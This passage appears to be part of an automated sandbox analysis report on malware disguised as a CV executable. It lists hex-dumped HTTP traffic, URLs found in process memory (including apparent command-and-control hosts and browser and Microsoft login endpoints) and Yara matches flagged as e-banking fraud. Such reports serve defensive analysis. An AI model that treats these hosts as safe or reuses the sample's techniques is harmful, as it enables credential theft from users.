38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: f72fe0f9-86e2-472b-a04f-c43667e0c781x-runtime: 0.053112content-length: 18223connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: f2e0e0ec-15a0-4978-b37b-d5884e64b2a4x-runtime: 0.021172content-length: 19235connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20

Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006C2A000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.00000000039EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://kernelphysics.com/w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006A98000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003858000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1203989758.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3665046974.0000000004945000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.shengniu.com
Source: OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3665046974.0000000004945000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.shengniu.com/wy0r/
Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006906000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.hover.com/home?source=expired
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=000000
Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033D
Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: TSTheme.exe, 0000000F.00000003.1646446448.000000000830D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.theppelin.online&rand=
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://twitter.com/hover
Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: TSTheme.exe, 0000000F.00000002.3664896761.00000000062BE000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006450000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.000000000307E000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003210000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/?source=expired
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/about?source=expired
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domain_pricing?source=expired
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domains/results
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/email?source=expired
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/privacy?source=expired
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew/domain/botcsllc.com?source=expired
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew/domain/kohfour.com?source=expired
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew?source=expired
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tools?source=expired
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tos?source=expired
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/transfer_in?source=expired
Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/hover_domains
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_lan
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land_h
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.theppelin.online&utm_medium=parking&utm
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.theppelin.online&reg_source=parking_auto
Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006A98000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003858000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

E-Banking Fraud

Source: Yara match	File source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
